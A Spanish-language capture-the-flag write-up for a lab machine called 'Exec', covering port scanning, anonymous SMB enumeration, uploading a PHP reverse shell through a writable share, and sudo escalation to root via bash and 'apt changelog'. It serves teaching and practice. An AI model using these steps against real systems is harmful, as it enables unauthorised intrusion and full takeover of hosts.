# Exec

### 🔍 **RECONOCIMIENTO**

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 192.168.1.74
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FNYQjLX1B0mCgU5vL87yN%2Fimage.png?alt=media&#x26;token=c8f55a58-1191-4387-bece-1496ccdf3393" alt=""><figcaption></figcaption></figure>

A continuación, se realiza el comando:

```bash
nmap -p- --open 192.168.1.74 --min-rate 5000 -n
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FH2T7cS2BSWOeTKS2MvrW%2Fimage.png?alt=media&#x26;token=0d52f08e-8512-473c-8e0c-15afed8a2400" alt=""><figcaption></figcaption></figure>

Como podemos observar durante el escaneo, el **puerto 22** perteneciente al **servicio SS**H, el **puerto 80** perteneciente al **servicio HTTP**, el **puerto 139** y el **puerto 445**, ambos pertenecientes al **servicio SMB** (Server Message Block), están abiertos, por lo que a continuación se indagará más.

### 🔎 **EXPLORACIÓN**

Se utiliza el comando:

```bash
sudo nmap -sCV -p22,80,139,445 -v 192.168.1.74
```

para obtener más información sobre ese puerto específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FLwJWDh5usqaOMNNAkoJK%2Fimage.png?alt=media&#x26;token=18eadc9a-073c-4222-a8d0-cb34bf096752" alt=""><figcaption></figcaption></figure>

Revisamos el puerto 80. Como podemos ver es la página de por defecto de Apache.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FmADojQ26p0hikupWbhJb%2Fimage.png?alt=media&#x26;token=5f1947c0-55f5-40ca-88b4-c4c0647215b8" alt=""><figcaption></figcaption></figure>

Revisamos directorios.

```bash
gobuster dir -u http://192.168.1.74 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php,xml
```

No encontramos nada por lo que revisamos el servicio SAMBA al listar los directorios compartidos.

```bash
smbclient -N -L 192.168.1.74
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F6fKH0cIFosYYYrxbLSrx%2Fimage.png?alt=media&#x26;token=65053c74-8070-4e3d-bb67-3752f4999ac5" alt=""><figcaption></figcaption></figure>

Vemos que permisos tenemos.

```bash
smbmap -H 192.168.1.74
```

Tenemos permisos de escritura y lectura en el directorio compartido **/server**.

```bash
smbclient //192.168.1.74/server
```

### 🚀 **EXPLOTACIÓN**

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FEX2vz1vYleuPk6EmbiuP%2Fimage.png?alt=media&#x26;token=e3501e36-6cba-4b9e-9bef-d089096beb96" alt=""><figcaption></figcaption></figure>

Voy a intentar subir una Reverse Shell ya que parece ser que corresponden a las páginas del puerto 80.

```
put revshell.php
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FdJkUSdkswD66yBQlTTgz%2Fimage.png?alt=media&#x26;token=c89a98b8-e0a1-421b-9db6-4a02d78fc13e" alt=""><figcaption></figcaption></figure>

Hacemos el [tratamiento de la TTY](https://invertebr4do.github.io/tratamiento-de-tty/) para trabajar más cómodos.

### 🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

```bash
whoami
```

aún no somos **root**, por lo que hacemos:

```bash
sudo -l
```

para ver si hay algo para explotar.&#x20;

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Frw8658uPTlVmwHZdQatS%2Fimage.png?alt=media&#x26;token=0a6b465f-25b6-41b0-ba5f-1bab5d480489" alt=""><figcaption></figcaption></figure>

{% embed url="<https://gtfobins.github.io/gtfobins/bash/#suid>" %}

<pre class="language-bash"><code class="lang-bash"><strong>sudo -u s3cur4 /usr/bin/bash
</strong></code></pre>

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FIEdbbvrhtFgbn1ezyYjM%2Fimage.png?alt=media&#x26;token=83acfdd1-c1e8-43d0-af13-605eededc601" alt=""><figcaption></figcaption></figure>

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F8GKU3CB2NA9Ll8dWzVxR%2Fimage.png?alt=media&#x26;token=a3a1c998-5255-482b-ade8-bfeffb48dfdb" alt=""><figcaption></figcaption></figure>

{% embed url="<https://gtfobins.github.io/gtfobins/apt/#suid>" %}

```bash
sudo -u root /usr/bin/apt changelog apt
!/bin/bash
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FcirsQgIS48HrJ1YxE33C%2Fimage.png?alt=media&#x26;token=cf9f1447-350a-4c9c-a7b9-da688ab11604" alt=""><figcaption></figcaption></figure>

Ya somos **root**.
